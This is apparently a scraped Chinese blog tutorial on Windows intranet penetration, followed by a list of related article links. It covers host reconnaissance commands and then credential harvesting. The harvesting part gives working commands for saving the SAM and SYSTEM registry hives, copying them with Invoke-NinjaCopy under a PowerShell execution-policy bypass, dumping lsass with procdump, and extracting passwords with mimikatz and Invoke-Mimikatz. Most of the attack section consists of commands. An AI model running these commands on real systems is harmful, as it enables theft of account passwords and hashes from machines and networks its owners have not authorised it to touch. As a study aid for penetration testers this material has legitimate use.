一、基础信息收集

使用systeminfo命令查看操作系统版本、架构、补丁情况

Windows-Exploit-Suggester-master
-u 参数升级并将数据库下载至本地:

-i 参数指定系统信息文件;-d 参数指定本地数据库文件,提示需安装xlrd读取Excel文件:

pip安装模块:

再次运行,成功:

使用Whomai、net user查看用户信息


使用net localgroup查看本地用户组

使用net localgroup “组名”来查看用户组信息

使用net accounts查看密码策略

使用query user查看最近登录信息

使用ipconfig查看网络适配器信息

使用ipconfig /all查看所有适配器

使用ipconfig /displaydns 查看dns缓存

使用net use 查看网络连接

使用netstat查看网络服务

使用netstat -ano 查看开启的端口

使用route print 查看路由信息

使用arp -a 查看arp缓存

二、凭证收集

导出sam数据库中的密码

方法1:以管理员权限运行cmd,输入以下命令

reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive

方法2:使用powershell


powershell -exec bypass
Import-Module .\invoke-ninjacopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path   C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive

将生成的sam.hive与system.hive转至本地,使用saminside或cain导入
saminside

结果如下

cain

离线提取lsass进程

  • Vista及以上的系统可以打开任务管理器,选择显示所有用户的进程,找到1sass进程后右键创建转储文件
  • procdump.exe
procdump.exe-ma lsass.exe lsass.dmp

获取到内存转储文件后,就可以使用mimikatz来提取密码。这里需要注意的是运行mimikatz平台架构要与进行转储的系统兼容。命令如下:

sekurlsa::minidump lsass.dmp
sekurlsa:logonpasswords

在线凭证收集

Mimikatz
Mimikatz项目地址:

https://github.com/gentilkiwi/mimikatz

功能:抓取lsass进程中的密码,提取sam数据库中的密码,提取chrome凭据,提取证书,支持pass-the-hash、pass-the-ticket等攻击方式,功能非常强大

privilege::debug
sekurlsa::logonPasswords full

Powershell版Mimikatz
项目地址:

https://github.com/PowershellMafia/Powersploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

可以通过powershell下载执行来运行

powershell -exec bypass  Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'

内网渗透----Windows下信息收集相关推荐

  1. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

  2. 内网渗透——WINDOWS认证机制之KERBEROS

    之前两篇文章整理了NTLM协议的分析与利用 1.内网渗透--WINDOWS认证机制之NTLM 2.利用netsh抓取连接文件服务器的NET NTLM Hash 本篇文章来学习域内认证的Kerberos ...

  3. linux下敏感文件(账号密码)查找—内网渗透linux主机密码收集

    目录 find命令 命令格式 按照文件/目录名搜索 linux正则表达式 find同时查找符合多个格式的文件 grep命令 管道符| egrep xargs命令 案例 内网渗透中linux主机查找账号 ...

  4. 内网渗透系列:信息搜集方法小结2

    目录 前言 一.开源情报(OSINT) 1.whois/反查/相关资产 2.github敏感信息 (1)github邮箱密码爬取 (2)GSIL (3)x-patrol 3.google hackin ...

  5. 内网安全学习(1)---信息收集

    内网安全-域环境&工作组&局域网探针方案 (此内容参考b站小迪师傅的公开课程学习特此记录) 1.一些基本概念知识: 内网拓扑图: 内网内有各种服务.安全设备以及个人电脑,一般DMZ多为 ...

  6. 【内网安全】域信息收集应用网络凭据CS插件AdfindBloodHound

    域信息收集&应用网络凭据&CS插件&Adfind&BloodHound 环境搭建 域基础知识 工作组和域 背景与思路 常规信息类收集-应用&服务&权限等 ...

  7. 【内网安全】——Linux信息收集

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:遗憾吗?当然 我们在获取到webshell之 ...

  8. 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作. 抓 ...

  9. 内网渗透-windows远程用户管理

    文章目录 0x01 获取window权限(管理员) 0x02 添加用户,并且到管理员组 0x03 开启远程桌面 0x04 添加到远程桌面组 0x05 进行远程 0x06 免责声明 0x01 获取win ...

最新文章

  1. php 正则中文匹配
  2. linux下配置环境变量【原创】
  3. redis info memory
  4. C++继承中析构函数 构造函数的调用顺序以及虚析构函数
  5. Linux下WRF Domain Wizard使用教程(PART2: 使用教程及 遇到的种种BUG)
  6. oracle结果集过大,多重子查询/大结果集查询问题
  7. 什么 时候用转义字符
  8. AD迁移工具:ADMT
  9. Unity中使用GameObject.Find、Transform.Find查找GameObject
  10. HTML5div css入门案例,div+css教学教案(学习入门到精通~)详细讲解.doc
  11. 【VS2010学习笔记】【错误调试】error LNK1123:转换到COFF期间失败;文件无效或者损坏
  12. LCA算法 在线树上倍增模板
  13. matlab 时钟日历教程,Flash制作电子日历时钟教程
  14. C语言的除法和取余问题
  15. 热敏电阻测温度c语言编程,NTC热敏电阻测温度 单片机C和汇编源程序
  16. xp怎么查看计算机配置,怎么查看xp系统的配置信息
  17. lintcode 168. 吹气球 动态规划
  18. 概率论 参数估计与假设检验 区分及例子
  19. db mysql error_list
  20. C# F23.StringSimilarity库 字符串重复度、文本相似度、防抄袭

热门文章

  1. 曲面电视市场日渐成熟,TCL缘何“一骑绝尘”?
  2. uview中button细边框去除问题
  3. 【数据库】码,超码,候选码与主码,外码
  4. 韵脚与押韵的练习(十三韵)
  5. javascript实现汉诺塔
  6. 正则表达式,匹配数字
  7. gitlab从安装到使用到常见问题处理
  8. Indoor Scene Recognition 室内场景识别数据集
  9. 图形界面介绍Create Size Blockage
  10. 2022-07-17 Linux group与user基础概念